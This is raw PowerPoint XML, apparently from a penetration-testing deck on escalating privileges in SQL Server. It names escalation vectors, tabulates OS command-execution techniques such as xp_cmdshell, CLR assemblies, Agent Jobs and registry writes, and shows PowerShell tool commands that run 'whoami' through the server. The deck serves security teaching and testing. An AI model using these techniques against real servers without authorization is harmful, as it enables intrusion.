              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>cover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Account</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Several</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>vectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Indirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Accounts</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Crawling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Links</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>UNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4130397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82D0-1BD7-BC4A-8054-93FE502405AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71DBD80-8F83-A041-9BA5-B53246037C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1600200"/>
          <a:ext cx="10972800" cy="2884917"/>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503788552"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2743200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1063908794"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2743200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="176808307"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2743200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3296077000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Technique</a:t>
                      </a:r>
                      <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Config</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Change</a:t>
                      </a:r>
                      <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Requires</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t> SA</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Requires</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t> RW IO</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2504080456"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Xp_cmdshell</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a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2365950228"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Custom</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Extended</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t> SP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2814594030"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>CLR </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Assembly</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a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="559018714"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>Agent Job</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1000273597"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t>Python </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Execution</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a:t>No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="594365297"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Write</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t> to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>autorun</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1519125732"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360615">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Write</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
                        <a:t> to registry</a:t>
                      </a:r>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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2622582404"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A61EC062-5320-8840-9BE8-6BE9B610564E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4625337"/>
            <a:ext cx="11041227" cy="7696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467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>-SQLOSCLR -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Invoke-SQLOSOle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>-SQLOSR -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1467" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369DB357-7C8A-7940-A770-575F71273198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5430591"/>
            <a:ext cx="10766987" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
